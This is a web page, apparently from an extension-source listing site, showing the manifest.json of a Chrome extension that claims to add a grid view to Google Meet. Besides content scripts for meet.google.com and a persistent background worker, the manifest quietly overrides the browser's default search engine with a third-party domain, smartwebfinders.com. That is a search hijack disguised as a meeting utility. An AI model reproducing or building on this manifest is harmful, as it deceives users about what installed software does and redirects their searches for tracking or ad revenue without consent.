Grid View for Google Meet (fixed)

Grid View for Google Meet (fixed)

Allows More Users in Google Meet Grid View

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "manifest_version": 2,
  "name": "Grid View for Google Meet (fixed)",
  "description": "Allows More Users in Google Meet Grid View",
  "version": "1.0.6",
  "icons": {
    "24": "icon24.png",
    "36": "icon36.png",
    "48": "icon48.png",
    "128": "icon128.png",
    "256": "icon256.png",
    "512": "icon512.png"
  },
  "browser_action": {
    "default_icon": {
      "24": "icon24.png",
      "36": "icon36.png",
      "48": "icon48.png"
    },
    "default_popup": "popup.html",
    "default_title": "Google Meet Grid View"
  },
  "background": {
    "scripts": [
      "update_worker.js"
    ],
    "persistent": true
  },
  "permissions": [
    "storage"
  ],
  "content_scripts": [
    {
      "matches": [
        "*://meet.google.com/*"
      ],
      "js": [
        "browser-polyfill.js",
        "content.js",
        "mutesync.js"
      ],
      "run_at": "document_idle"
    }
  ],
  "web_accessible_resources": [
    "grid.user.js"
  ],
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "Smart",
      "keyword": "Smart",
      "search_url": "https://smartwebfinders.com/?n=3&q={searchTerms}",
      "favicon_url": "https://smartwebfinders.com/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  }
}